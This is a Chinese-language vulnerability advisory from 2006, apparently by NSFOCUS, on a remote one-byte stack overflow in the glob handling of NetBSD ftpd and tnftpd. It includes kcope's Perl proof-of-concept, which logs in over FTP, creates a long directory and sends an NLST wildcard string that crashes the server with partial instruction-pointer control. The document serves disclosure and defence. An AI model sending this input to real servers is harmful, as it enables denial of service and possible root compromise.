安全研究
安全漏洞
NetBSD ftpd和tnftpd移植远程栈溢出漏洞
发布日期:2006-12-01
更新日期:2006-12-07
受影响系统:
NetBSD NetBSD 3.0描述:
Luke Mewburn tnftpd 20040810
BUGTRAQ ID: 21377
tnftpd是NetBSD FTP服务器在其他系统上的移植,可提供对传统BSD ftpd的功能增强。
NetBSD ftpd和tnftpd在处理目录的扩展时存在溢出漏洞,远程攻击者可能利用此漏洞导致拒绝服务或执行任意指令。
问题存在于glob.c文件中,这是一个单字节溢出漏洞,如果攻击者能够创建文件夹并使用特殊通配符(如星号)覆盖内部栈缓冲区的话,在某些特定系统中可能执行任意指令。
<*来源:kcope (kingcope@gmx.net)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# $$$ NetBSD ftpd and ports *Remote ROOOOOT $HOLE$* $$$
#
# About
#
# tnftpd is a port of the NetBSD FTP server to other systems.
# It offers many enhancements over the traditional BSD ftpd,
# including per-class configuration directives via ftpd.conf(5),
# RFC 2389 and draft-ietf-ftpext-mlst-11 support, IPv6,
# transfer rate throttling, and more.
# tnftpd was formerly known as lukemftpd,
# and earlier versions are present in Mac OS X 10.2 (as ftpd)
# and FreeBSD 5.0 (as lukemftpd).
#
# Description
#
# The NetBSD ftpd and the tnftpd port suffer from a remote stack overrun,
# which can lead to a root compromise.
#
# The bug is in glob.c file. The globbing mechanism is flawed as back in
# 2001.
#
# To trigger the overflow you can create a folder and use the globbing
# special characters (like STARS) to overflow an internal stack based
buffer.
#
# gdb output tested on NetBSD 3.0 i386 NetBSD-ftpd 20050303 :
# (gdb) c
# Continuing.
#
# Program received signal SIGSEGV, Segmentation fault.
# 0x00410041 in ?? ()
# (gdb)
#
# tnftpd-20040810 behaves similar.
# FreeBSD (lukemftpd) and MacOSX (ftpd) were not tested,
# however they could have the same bug, because of the same
# codebase.
#
# The problem when exploiting this kind of bug is,
# that we can only control 0x00410041, not the whole
# 32 bit. However it looks feasible to find a way
# to do a hole EIP redirection and/or exploit
# the bug the "unicode" way, which could be especially
# hard on BSD systems.
# kcope
use IO::Socket;
$sock = IO::Socket::INET->new(PeerAddr => '192.168.2.10',
PeerPort => '21',
Proto => 'tcp');
$c = "C";
$a = "C" x 255;
$d = "A" x 450;
print $sock "USER kcope\r\n";
print $sock "PASS remoteroot\r\n";
$x = ;
print $sock "MKD $a\r\n";
print $sock "NLST C*/../C*/../C*/../$d\r\n";
print $sock "QUIT\r\n";
while (<$sock>) {
print;
}
建议:
厂商补丁:
NetBSD
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.netbsd.org/Security/
Luke Mewburn
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://freshmeat.net/projects/tnftpd
浏览次数:3128
严重程度:0(网友投票)
绿盟科技给您安全的保障